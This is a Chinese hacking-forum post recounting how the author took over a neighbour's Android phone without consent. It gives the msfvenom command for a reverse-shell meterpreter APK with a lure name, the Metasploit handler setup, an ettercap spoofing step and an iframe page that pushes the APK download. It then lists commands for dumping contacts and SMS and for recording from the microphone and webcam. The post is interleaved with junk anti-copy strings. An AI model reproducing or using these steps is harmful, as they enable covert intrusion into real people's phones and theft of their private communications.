找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1509|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% E2 E6 M j& x* _# [) n+ x5 j 五、msf+ettercap入侵邻居安卓手机 ' n3 H0 E8 \2 D* a& P) ^/ R/ i

+ W4 G7 R% I( L1 F

6 M8 c) ~% j- j 首先启动msf 8 c' {, J" @* Y: l6 j

5 K. A, V4 w9 }) P

/ ]+ e3 N: G% H( {0 G 先用kali生成一个安卓木马,如下命令: , \" l2 a' H- t2 F! j1 ^3 Q& ?# o

$ h/ o" b9 @0 N: d* U+ B

: V) e7 M# X4 _ I! [2 h0 z2 n Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 4 X' o$ I: a( c) _& y! E8 d7 e

1 Q6 }, Z4 J8 C* X& z( V2 h; d0 e

0 W6 M3 w1 f% e% O7 B 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 - ]% s) I( Y2 o2 y$ F8 Z) M

; @% d/ ?) p( J: J" K) r

C1 b0 V& [7 m$ x9 y, { 然后进入msf 2 ]% @7 f& I0 q& }9 L

+ C) i% _/ c& Z: }, g

: K; ]/ q; F$ H' R* J2 L% H use exploit/multi/handler " [* G4 X! X! U

- E: s: X% B+ A* u7 P

" K! l: ~# D# z1 X6 I set payload android/meterpreter/reverse_tcp 2 K/ [) F4 \' l

( y# o. B! Q4 C! L2 e) w: _

3 D9 k/ n3 l8 S0 x. l$ a set LHOST 192.168.0.109 //ipkailiip + u! P. D; I& X% `

. e' o/ @2 E' F9 m) s) g

. M$ `' h0 J. m& r: `7 n set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 s" J. o, \8 W6 q

" ^7 U3 s/ X- \' g: ^. q) _

5 h+ ~( S1 B8 Y! D2 H F Exploit $ b: h7 z/ p" R3 g8 J% `( [4 m

; [" _1 r2 j7 _ i

+ _. l! f7 v2 U   2 u" [/ D3 B4 y4 B

2 H* {/ _2 m; A' W% t

) A2 r' Y4 c( _/ P6 M 下面我们开启ettercap -G : E2 Z* r' U0 t

$ ~, r k- m, o5 r6 E, l

0 V& H- E- t; H& k: _! \9 [# n: m) V) O 我物理IP , e4 M! ]. `, [& j

2 T! x2 f) H; e) v) q

' |. |6 d3 ]9 q6 f   ! e J( x1 p }* B; s+ s

2 [# f3 ]. z& c

5 j6 S% d4 N) k; C. g 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, , ]2 ?4 }: k: R4 M7 j

7 r& z& \" e+ g4 D

( i/ K9 z m) k `& j 下面我们来设置一下 ) X" x0 F& U3 y/ a: a! l: U

" M8 k, m# C$ j8 i! Y7 i/ p

& ]$ R2 x- V# D: m3 X9 j: W   - Z# ~7 c2 s, D$ w" \

2 m" |) ^$ g9 {' H: |/ q

) |' w( a# T6 b 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, . O) Z; ]- k2 A/ l7 B( U

$ L' u* J6 ~; N) x7 A/ H

3 |" J3 a0 ^6 n& i/ o1 p   5 c( ?) l& Q# |0 G; R

+ d0 ]8 ]8 M5 c# M

4 O# Q+ `6 B: i, i0 P   * K- ^. M# P" F$ C5 U* `

. _3 ^0 ]0 R7 D! D. m/ J

& R8 x* u! O- T; `   5 j/ k. ^( I* J" a; ^

' B! Q; w$ v& U) b0 q; \

1 I4 q" g ?1 V0 W6 J6 J9 L1 b" P   ; t* c! T+ b7 R6 h6 c' H

: e. ^% G$ W8 e) g' z7 F

) p: ?2 e5 ?9 s. P+ ~   9 _$ T' @5 H% c; M

0 Z$ s9 N: Y' _" V& U ]

: P% x. ~# X$ s( L i* R   - [8 {5 P4 g5 H

8 [ E: |0 |2 o

" G" J" r) g: E$ s( ^3 {7 Z6 f, V   ) N% k* ~" B2 ~# ?% H* H

+ ~1 T0 Q! _$ ]( U

) |% o; B. E& d. o$ X7 @. ]0 m, P- S   8 Q, b& H3 u2 ^3 M" z

2 a2 n9 F {) f3 \" Z6 [4 z* P" S

) y2 v# d' |+ F9 h6 f+ m   ' @ M1 J3 p2 A s4 B4 Y( \

4 p$ H! w: h4 y

. P s' W4 ~6 [5 ]5 J2 P   - \. H1 O# D* _6 A

& f% @& o* E& @8 i# `* t" x5 t

5 J6 G9 E% w' Q   5 e3 B" X; R/ g

( M# ~; N3 f, k/ L9 Y( Z& s% u9 C" W

# _1 m5 g6 y" O: `! `   , O n0 d& f+ ]7 s$ w

9 M8 Z. A4 e. }' ~; F

6 y6 m' I- m4 q! f& n/ C   # u/ l3 l! w: b

) w2 c1 [! ~' B% ^7 v j- m

+ d6 ^3 d! v8 x" s- C 下面我们开始攻击 . ]9 M) N7 n# L* I- S

- j$ M2 \& a0 R: C) _$ B7 i/ x

; D$ S7 s- O s   ' x3 F3 v: A) B7 z6 L

$ }4 r' K x- T4 j! C! m

, q* k8 e/ j7 Q$ e   ; @# K: M1 W/ i

1 Q! U" a9 r4 t* }7 w9 z$ W

7 T' x! Q; S7 e1 j W   3 H7 L0 ^' n9 A( j& l! m( L# p/ m

; W; u* f3 w0 M9 U$ C

# A- ?9 i/ M# p/ s# u0 i0 ^   ! K3 ]/ e, u: w. A2 d. ]- o

: V3 o2 _$ S9 Z( s2 ]! F. L

. ] m) ~! E+ w+ V1 x9 W" n& \   2 N! K6 e( I6 u

. m& ^0 ^' i X7 g z5 F9 a

0 V: y6 e5 [2 K- s3 {8 _$ W 大概过了5分钟多,发现反弹成功了 4 @& A5 t6 d7 X7 G. R! E4 \" I0 A% f" T

4 H+ n b, [& ], T) |3 H% f

0 z1 K, h* d7 x& W& ]/ t" e/ S   |* K- c- Z: M& a3 o }& X9 K

; W- G* k p4 ]$ A/ g

! y P8 } z- Y, H. n1 S   ! u2 b4 ]; O8 C# h& }

1 u) q/ t. C4 A0 c: f% z

/ ]& [- R( f! u+ P* U/ c/ U   ! b0 ]+ T: H5 b: k: a" ?! i

- H$ k2 z b N. P) q9 }) ?8 l$ ?

6 D1 a/ N$ U/ R4 s7 ~( I5 `   0 y b3 T a* M4 l3 U! G

) q- A( a' e5 z E: u/ H

! G' `* f. O2 L& q7 M( d   1 g/ K2 `+ I- Q! f' ?# X8 h+ P! V

9 p `. A" a6 q0 u* x% c( l% H

8 v3 \8 x# G' B2 s% g/ g   ( P; Q: N$ z, S$ h2 k2 r8 w

5 l- I3 W. [& N' p6 C5 q

% b, e7 m% C; r8 e& {2 N. Y. }   ) A. m0 Z/ |" M7 P8 _4 [8 s

* P0 ^- U% i" v& S

% \. n2 n9 y- f; \8 o 执行命令 . c/ ?2 @. U4 q( h

+ o* L' i- z: W, l+ F. d5 n

% J# E1 U4 [! V   1 V' \. T% ] n+ h# p# {

: R8 P0 W& O% `% l+ `/ L

1 S" x1 J3 s; d( y0 X dump_contacts    --》这个是导出电话 " E# c$ |7 C/ H" X" ~; [

5 C! `& p8 l; W# r$ ?( P! a

c, u0 s6 r$ k5 N dump_sms --》这个是导出信息 9 b2 M: Y4 a( u0 [! g

8 x/ `/ j D' ?. c

; i) d9 i) M1 s6 _ record_mic     Record audio from the default microphone for X seconds ( L+ ]" y9 y0 r( N/ e

: F/ C4 g z) r& J# n

& v3 ~+ U \* Y! ?     webcam_chat    Start a video chat - l0 g) x6 l* d

( e1 U, M- Z4 ?2 e

% T, Z# D( V$ l6 d! r0 @7 Y     webcam_list    List webcams 8 W: L6 Y6 b$ T# M4 d$ p4 \

0 d3 n0 `8 u) D& c6 Z/ W9 n

n4 E9 M6 E9 U5 {/ n' Q8 c     webcam_snap    Take a snapshot from the specified webcam 5 ?; N& L4 j4 F

4 p9 S% G6 t, S5 @8 v+ j6 V

4 V. y. Q: o! Y! P' U, J' o& r webcam_stream  lay a video stream from the specified webcam 9 u j) ^" V6 V

$ m/ y: d* x1 {* X7 W" M

9 p& r8 W" i# L1 g   4 u0 p' a i7 e# M6 c0 C T

! ^" B0 e$ t4 G8 }; s+ u- C

1 |# Y/ ?. Q$ B0 ]. P   5 a9 Z, H% U; G- @& G; m

% x- M- B# O, z8 F. E

T5 C. \5 Y7 W- h- U5 b# p# W 我们打开看一下电话薄, % T I8 u+ \7 c7 s$ z6 A9 v/ G8 V+ q

) k, m( c u: q

( ?# i% }3 ^8 `5 C   " a% ^. ?: V2 F' [; T; U6 j

! P$ ?( Y d( h' D; _$ P! u' d

' k2 @( z0 }) F5 k4 G5 h   8 d/ k9 A4 h1 {. M- L d8 I

5 G$ o0 y7 J' T8 X! D

) `. |. {1 F! }* C$ G   0 I/ M- J* b. ]; B

p' n6 g) w# P; z& R- F1 H

/ S/ L# h. p# `6 s4 r; ^   ) w3 q# I0 ]- @$ p: V$ x

8 d6 d% s6 A$ Z) o. B/ z' k0 k

6 K! K/ p2 G) y Z& V   * Q" I$ j) a( o/ H# c1 T

+ k) N [: R. [. B- \3 @) S/ S/ D1 u

9 Z9 I/ H% C# H0 I/ G# E5 ]   & o" Q" O, b Q- X7 Q, h

: H; E) c. p) Y" t

, X% }" f5 y) J2 B0 Q( X 我们同时欺骗成DroidJack木马,使用方法如图: & V W E- j4 y& H

' [7 D/ J" x+ ~; {) r& W1 A

, n/ `+ t" k Y' y   , [6 @3 P9 y i) o2 Z

& z* z- U: S0 j/ [ k Y9 Y, ?

7 Z" V3 r& j6 M* k   ) L1 E, a- g. u X' e( a+ e( Q

, Y5 z. Y- D( j Q+ J

! p* X# q: N* {4 b R* e( E   5 T, c$ ^/ s$ ~# ?- I

+ J3 R4 r0 h! I; O$ F7 n

! b9 @! r8 B( U0 i% g1 _ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 9 z `) z: z9 A) q" R& ]

+ H h/ }" E9 W: |1 @

8 U. ]7 v8 A9 e2 N. t" L   ; T0 Q' `. ?% J3 A) A3 b3 z8 j

, @5 T0 b. @! w4 @

y! F9 H v" k2 }- J" J& O3 t' n   ! }8 o2 R! {7 s# M3 F2 _

& M# v6 f9 s) u5 b1 g3 O( k# s

' q) y" L% k& g: E   4 U) p1 \+ D4 w3 j3 r' v3 O4 Q& s! q

! ^: h) b5 ]$ M: Q1 U( c. i

5 |6 u7 i- ^. K- R- q, p N 3 d1 x- L/ R4 e

: _4 i* V; W& n" y

7 }- s6 f+ p* W* {. \0 X
, y4 T2 w, P t( o: Z

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表